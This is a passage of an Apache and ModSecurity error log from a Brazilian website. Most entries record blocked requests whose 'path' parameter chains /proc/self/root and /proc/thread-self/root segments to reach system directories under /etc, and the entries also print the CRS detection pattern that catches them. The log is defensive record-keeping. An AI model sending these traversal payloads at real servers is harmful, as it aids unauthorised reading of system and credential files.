"bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwyBwbLMZ6AikZjR9V4kgAAAA0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:27:38.567052 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.241.31:59774] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwyCta6ubjKNq_cu4ZxugAAA0M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:27:40.937794 2026] [proxy_fcgi:error] [pid 27293:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:54982] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:27:41.804915 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.241.31:59780] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwyDQkwaGbbGflqUZDkZQAAAM8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:27:44.393829 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.241.31:59790] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwyEOoXxyEfFpUF8f8ngwAAAUk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:27:47.450627 2026] [:error] [pid 17653:tid 140411548894976] [client 74.7.241.31:59804] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwyEsdf6f5d65gmYZSVFwAAAtc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:27:48.743416 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.241.31:48674] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwyFMdf6f5d65gmYZSVGQAAAsI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:27:50.824687 2026] [:error] [pid 17887:tid 140411632822016] [client 74.7.241.31:48690] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwyFgkwaGbbGflqUZDkawAAAM0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:27:52.993621 2026] [:error] [pid 14269:tid 140411624429312] [client 74.7.241.31:48698] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwyGAbLMZ6AikZjR9V4mwAAAA4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:27:56.126777 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.241.31:48712] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwyG-oXxyEfFpUF8f8niAAAAVc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:27:58.113337 2026] [:error] [pid 27293:tid 140411666392832] [client 74.7.241.31:49260] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwyHv-YZRR_7pZ7nDKmdgAAA8k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:28:00.771735 2026] [:error] [pid 27293:tid 140411733534464] [client 74.7.241.31:49260] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwyIP-YZRR_7pZ7nDKmdwAAA8E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:28:03.997897 2026] [proxy_fcgi:error] [pid 7545:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:55536] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:28:04.631160 2026] [:error] [pid 30077:tid 140411716749056] [client 74.7.241.31:49262] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwyJPu8EFLIOrSqIpvDrwAAAkM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:28:10.125169 2026] [:error] [pid 7235:tid 140411632822016] [client 74.7.241.31:53736] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwyKvqxLDW4GITHUkSDvAAAAQ0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:28:14.599860 2026] [:error] [pid 30077:tid 140411674785536] [client 74.7.241.31:53748] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwyLvu8EFLIOrSqIpvDswAAAkg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:28:17.903143 2026] [mime_magic:error] [pid 26799:tid 140411674785536] (70014)End of file found: [client 57.141.18.27:58308] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 14:28:20.703022 2026] [:error] [pid 7893:tid 140411607643904] [client 74.7.243.128:52660] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwyMxCii7xarUs8iHYEWgAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 14:28:20.705597 2026] [:error] [pid 7235:tid 140411565680384] [client 74.7.241.31:53756] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwyM_qxLDW4GITHUkSDwAAAARU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:28:26.033820 2026] [proxy_fcgi:error] [pid 7893:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:56056] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:28:33.316998 2026] [:error] [pid 8307:tid 140411607643904] [client 74.7.241.31:54680] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwyQb-FhjpZGs9ba8qGBgAAAxA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:28:40.683494 2026] [:error] [pid 8307:tid 140411683178240] [client 74.7.241.31:54680] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwySL-FhjpZGs9ba8qGCwAAAwc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:28:42.866592 2026] [:error] [pid 7545:tid 140411716749056] [client 74.7.241.31:50876] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwySn8B84UptSoTJtYp6QAAAYM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:28:50.071532 2026] [proxy_fcgi:error] [pid 14269:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:56562] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:29:13.065932 2026] [proxy_fcgi:error] [pid 17653:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:57000] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:29:31.229029 2026] [:error] [pid 7545:tid 140411708356352] [client 74.7.241.31:50878] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwye38B84UptSoTJtYqFAAAAYQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 14:29:32.479635 2026] [:error] [pid 17887:tid 140411607643904] [client 74.7.243.128:45168] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwyfAkwaGbbGflqUZDkswAAANA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:29:35.131113 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.241.31:58412] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] 